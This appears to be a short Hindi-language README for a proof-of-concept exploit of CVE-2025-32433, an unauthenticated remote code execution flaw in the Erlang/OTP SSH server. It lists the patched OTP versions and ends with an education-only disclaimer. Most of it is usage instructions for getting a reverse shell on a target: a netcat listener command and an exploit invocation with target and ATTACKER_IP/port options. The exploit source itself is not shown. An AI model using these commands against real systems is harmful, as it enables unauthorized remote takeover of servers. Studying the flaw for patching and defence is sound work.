
PoC जो Erlang/OTP SSH सर्वर में बिना प्रमाणीकरण के रिमोट कोड निष्पादन (unauthenticated remote code execution) को दर्शाता है। SSH प्रोटोकॉल संदेश प्रबंधन में एक दोष का फायदा उठाकर, एक हमलावर वैध क्रेडेंशियल्स के बिना लक्ष्य पर मनमाने कमांड निष्पादित कर सकता है।
PoC जो Erlang/OTP SSH सर्वर में बिना प्रमाणीकरण के रिमोट कोड निष्पादन दर्शाता है।
SSH प्रोटोकॉल संदेश प्रबंधन में एक दोष का फायदा उठाकर, हमलावर बिना वैध क्रेडेंशियल्स के लक्ष्य पर मनमानी कमांड निष्पादित कर सकता है।
यह समस्या OTP-27.3.3, OTP-26.2.5.11, और OTP-25.3.2.20 में पैच की गई है।
लिसनर सेटअप:
nc -lvnp 1234
एक्सप्लॉइट चलाएँ:
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
--rhost : लक्ष्य IP--rport : लक्ष्य SSH पोर्ट--lhost : रिवर्स शेल के लिए आपका IP--lport : आपका लिसनर पोर्ट

यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों के लिए है। इस एक्सप्लॉइट का उपयोग उन सिस्टमों पर न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है। दुरुपयोग अवैध हो सकता है और सख्त वर्जित है।